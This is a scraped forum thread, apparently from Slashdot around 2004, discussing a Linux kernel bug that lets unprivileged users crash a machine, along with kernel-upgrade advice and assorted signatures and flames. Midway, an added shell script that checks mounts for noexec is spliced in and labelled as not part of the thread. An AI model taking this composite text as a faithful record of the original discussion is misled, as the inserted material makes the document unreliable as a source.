Time is Nature's way of keeping everything from happening at once... the bitch.
I have coded in VB for fifteen years, and in Java for over ten
Hehe .. Java of course came out in '95 ... Anyway, I remember back in '98 I was reading the jobs section of a newspaper, and remember laughing at one company's ad: they were looking for Java programmers, and required that applicants had a minimum of five years Java programming experience.
Yeah, technically, it's not a DOS attack. But when the machine locks up/crashes, it's pretty much the same result, no?
There is no America. There is no democracy. There is only IBM and AT&T and DuPont, Dow, General Electric, and Exxon
No, it becomes a serious problem when someone figures out a way to trigger the attack without the direct need for a command shell. (worm/trojan, for example.)
Presume there is a bug that can trigger a lockup/crash remotely. The gist of my post still applies, no?
Yes if somebody can get arbitrary code to execute, they could execute this and thus crash the machine. However I still feel that if somebody can get arbitrary code to execute, they could instead give themselves a shell (from which they could execute this bug and many others), or execute much more destructive code such as deleting files.
It does seem the main threat is that even a total novice who has a shell account can probably figure out how to crash a machine. This is a threat to universities providing rlogin and some similar stuff, but probably not to a lot of servers.
Linux trolls got it all wrong. Windows don't suck, it blows.
1f u c4n r34d th1s u r34lly n33d t0 g37 l41d
So, for signaling, fast call gate in the IDT is more dangerous than slow switching task in the IDT :P
open4free ©
For once I'm more secure with my ancient 2.4.18 kernel!
Those who won't learn from history are doomed to repeat it, including you.
Not everyone who pounds on Microsoft's character is doing it by reflex. The company as such, following the character of its fearless leader, is actually as amoral as it is so often painted - and that's only the greed and carelessness we actually know about because it's been made public; what about the other skeletons in their closet?
Linux is not a panacea, although it does everything I personally need and more, but it is being adopted in far too many places simply because it's ABM (Anything But Microsoft).
I can say "BOOBIES" without the use of a calculator!
YHBT. YHL. HAND.
Love,
bonch (aka Overly Critical Guy)
Really, you can't be that blind, can you?
There's nothing wrong with "could've". The point is that illiterate people hear and say that, don't realize it's actually a contraction, and proceed to write "could of".
So what? Why do we want Linux to 'move into the desktop market'?
I personally want it to stay where it is. (Or maybe was a couple years back.) It's for experts. It's a GOOD thing that the unwashed masses have their Windows, and the expert geeks have their Linux. We don't want Linux to get dumbed down until it's Windows, do we? It won't be any better than Windows if it does.
Health is simply dying at the slowest rate possible.
You're right. There is no cure for stupidity as profound as yours.
there you're crashing user-space and root still has 10% of resources allotted to be able to log in and nuke the mischievous lamer.
here OTOH you have a simple non-root exploit that effectively denies root or anyone else for that matter any kind of access.
this exploit basically takes us back to the days of DOS when you could
:chaos
JMP chaos
and crash the PC
I thought it was pretty funny myself
It's good reading for anybody interested, however, unlike slashdot, registration is required.
/., allowing the trolls to post via Anonymous Coward serves a useful purpose. They get to blow off steam (or get off), and with the ability to auto-score them down in my profile, they don't bother me much.
/. balances it out with a partially-broken moderation system.
Completely off-topic... but are you saying registration-required is a good thing?
On
But then,
Wolde you bothe eate your cake, and have your cake?
I hate recompiling my kernel, it always takes me a number of attempts until everything works. Also my server is running Linux and is serving two houses of people with net access, I can't just take it down and mess around with it for hours while I have fun trying to get a working kernel.
/boggle
You have to take the machine down while you compile a new kernel?
Even a user-hostile distro like Gentoo allows you to compile a new kernel while the machine is still running, install the new kernel into a new slot in the boot partition (leaving the old kernel intact and bootable), and finally change grub to boot from the new kernel (leaving yourself a 30 second timeout on the kernel selection screen, in case you need to revert back).
Changing a kernel is easy. Especially if you're smart enough to keep good notes about what settings you used last time (or just make a simple copy of the config file).
Worst case, if it doesn't boot, is that you boot back to the old kernel while you re-examine what you did wrong while creating the new kernel files.
6/11/2004 hasn't happened yet. It's only June now and the 6th of November is far enough away we can plan for this!
The answer is no. It's not "a good thing", it's not necessarily a bad thing either. Slashdot's ability to give Anonymous Users the luxury to both view and post is rare, but since I'm directing traffic from here, I thought it appropriate to let everyone know that if they "want in" they'll have to register. It's a time saving measure for those who are interested in looking, but wouldn't be willing to register.
My comment serves the same purpose as the NYTimes links where "(soul sucking registration required)" warnings are common.
Kinetic stupidity has a new brand leader: Allen Zadr.
Thanks for clearing that up for us, Darl.
Obviously everybody should either patch their kernel or upgrade to a new one to fix this problem. But in the meantime, set the noexec bit on /home and problem solved.
This is another good reason to have /, /usr, /tmp, etc., each on separate partitions.
Just my $0.02 worth.
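The noexec stopgap suggested above is only as good as the mount table actually in force. The following is an added example, not code from the thread or from any distro: it reads lines in /proc/mounts format, reports which of the user-writable mount points (/home, /tmp, /var/tmp) lack noexec, and prints the hardened fstab line for one of them. The mount table shown is constructed sample data.

```shell
#!/bin/sh
# Added example (not from the thread). Checks a mount table in /proc/mounts
# format for user-writable filesystems mounted without noexec, which is the
# stopgap the post recommends until the kernel itself is patched.
#   <device> <mountpoint> <fstype> <options> <dump> <pass>

# Constructed sample mount table: /home and /var/tmp allow execution,
# /tmp already has noexec.
SAMPLE_MOUNTS='/dev/sda1 / ext3 rw 0 0
/dev/sda3 /home ext3 rw,nosuid,nodev 0 0
tmpfs /tmp tmpfs rw,nosuid,nodev,noexec 0 0
/dev/sda4 /var/tmp ext3 rw 0 0'

# find_exec_mounts MOUNTPOINT... : reads a mount table on stdin and prints,
# one per line, the requested mount points whose option list has no noexec.
find_exec_mounts() {
    awk -v want="$*" '
        BEGIN { n = split(want, w, " "); for (i = 1; i <= n; i++) wanted[w[i]] = 1 }
        ($2 in wanted) {
            split($4, opts, ",")
            has = 0
            for (j in opts) if (opts[j] == "noexec") has = 1
            if (!has) print $2
        }'
}

# fstab_noexec_line DEVICE MOUNTPOINT FSTYPE : the hardened fstab entry that
# replaces a plain "defaults" line for a mount users can write to.
fstab_noexec_line() {
    printf '%s %s %s defaults,nosuid,nodev,noexec 0 2\n' "$1" "$2" "$3"
}

# Run against the live system with: ./check_noexec.sh --live
# (the script name is a placeholder), otherwise against the sample table.
if [ "${1:-}" = "--live" ] && [ -r /proc/mounts ]; then
    find_exec_mounts /home /tmp /var/tmp < /proc/mounts
elif [ "${1:-}" = "--demo" ]; then
    printf '%s\n' "$SAMPLE_MOUNTS" | find_exec_mounts /home /tmp /var/tmp
fi
```

Remounting with noexec only blocks running binaries from those paths; it does not replace applying the kernel fix.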
At least monthly. And note that the recent "zero-day" IE exploit was based on a known bug which Microsoft didn't fix because they couldn't see how it would be used. FOSS people would (do) fix it anyway.
Two observations worth noting are that the Linux problems are actually being found and fixed: many of them are falling out of deliberate efforts to purify the kernel, whereas the corresponding problems in the MS-Windows core are not being found - at least, not by white-hats; and that if a DOS is the worst that can be found in Linux in... how long...? then we don't have all that much to worry about (but I'm glad that there are people out there worrying on my behalf anyway).